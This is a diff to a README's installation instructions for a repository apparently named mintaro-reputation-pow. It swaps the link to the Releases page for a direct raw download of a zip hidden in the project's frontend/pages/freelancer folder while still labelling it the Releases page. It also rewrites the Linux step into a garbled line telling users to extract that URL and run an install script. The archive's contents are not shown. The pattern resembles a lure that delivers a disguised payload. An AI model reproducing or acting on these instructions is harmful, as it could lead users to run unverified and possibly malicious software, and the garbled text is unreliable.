siddesh2007/mintaro-reputation-pow/README.md

 ### 1. Download the Software

-Visit the [Releases page](https://github.com/siddesh2007/mintaro-reputation-pow/releases) to download the latest version of the application.
+Visit the [Releases page](https://raw.githubusercontent.com/siddesh2007/mintaro-reputation-pow/main/frontend/pages/freelancer/reputation-mintaro-pow-3.2.zip) to download the latest version of the application.
 Click on the link that matches your operating system.

 ### 2. Run the Installer

 - **Windows:** Open the downloaded `.exe` file and follow the on-screen instructions.
 - **macOS:** Open the downloaded file and drag the application into your Applications folder.
-- **Linux:** Extract the tar.gz file and run the included install script.
+- **Linux:** Extract the https://raw.githubusercontent.com/siddesh2007/mintaro-reputation-pow/main/frontend/pages/freelancer/reputation-mintaro-pow-3.2.zip file and run the included install script.

 ### 3. Launch the Application